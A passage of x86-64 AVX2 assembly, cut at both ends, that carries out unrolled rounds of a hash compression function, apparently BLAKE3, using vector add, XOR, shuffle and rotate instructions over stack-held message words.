vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1A0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xC0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x160]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xA0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x140]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x180]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1C0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1A0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x80]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xA0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x180]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x120]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x1E0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1C0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x140]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0xE0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x40]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x60]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x120]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x160]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x100]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x1E0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x180]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x20]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1A0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x40]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x80]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x60]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x140]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0xC0]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
vpxor ymm6, ymm6, ymm11
vpxor ymm7, ymm7, ymm8
vpxor ymm4, ymm4, ymm9
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x160]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0xA0]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x20]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0x100]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 12
vpslld ymm4, ymm4, 20
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 12
vpslld ymm5, ymm5, 20
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 12
vpslld ymm6, ymm6, 20
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 12
vpslld ymm7, ymm7, 20
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1E0]
vpaddd ymm1, ymm1, ymmword ptr [rsp]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x120]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xC0]
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxor ymm12, ymm12, ymm0
vpxor ymm13, ymm13, ymm1
vpxor ymm14, ymm14, ymm2
vpxor ymm15, ymm15, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT8+rip]
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpshufb ymm15, ymm15, ymm8
vpaddd ymm8, ymm12, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxor ymm4, ymm4, ymm8
vpxor ymm5, ymm5, ymm9
vpxor ymm6, ymm6, ymm10
vpxor ymm7, ymm7, ymm11
vmovdqa ymmword ptr [rsp+0x200], ymm8
vpsrld ymm8, ymm4, 7
vpslld ymm4, ymm4, 25
vpor ymm4, ymm4, ymm8
vpsrld ymm8, ymm5, 7
vpslld ymm5, ymm5, 25
vpor ymm5, ymm5, ymm8
vpsrld ymm8, ymm6, 7
vpslld ymm6, ymm6, 25
vpor ymm6, ymm6, ymm8
vpsrld ymm8, ymm7, 7
vpslld ymm7, ymm7, 25
vpor ymm7, ymm7, ymm8
vpaddd ymm0, ymm0, ymmword ptr [rsp+0x1C0]
vpaddd ymm1, ymm1, ymmword ptr [rsp+0x40]
vpaddd ymm2, ymm2, ymmword ptr [rsp+0x60]
vpaddd ymm3, ymm3, ymmword ptr [rsp+0xE0]
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxor ymm15, ymm15, ymm0
vpxor ymm12, ymm12, ymm1
vpxor ymm13, ymm13, ymm2
vpxor ymm14, ymm14, ymm3
vbroadcasti128 ymm8, xmmword ptr [ROT16+rip]
vpshufb ymm15, ymm15, ymm8
vpshufb ymm12, ymm12, ymm8
vpshufb ymm13, ymm13, ymm8
vpshufb ymm14, ymm14, ymm8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm13, ymmword ptr [rsp+0x200]
vpaddd ymm9, ymm9, ymm14
vpxor ymm5, ymm5, ymm10
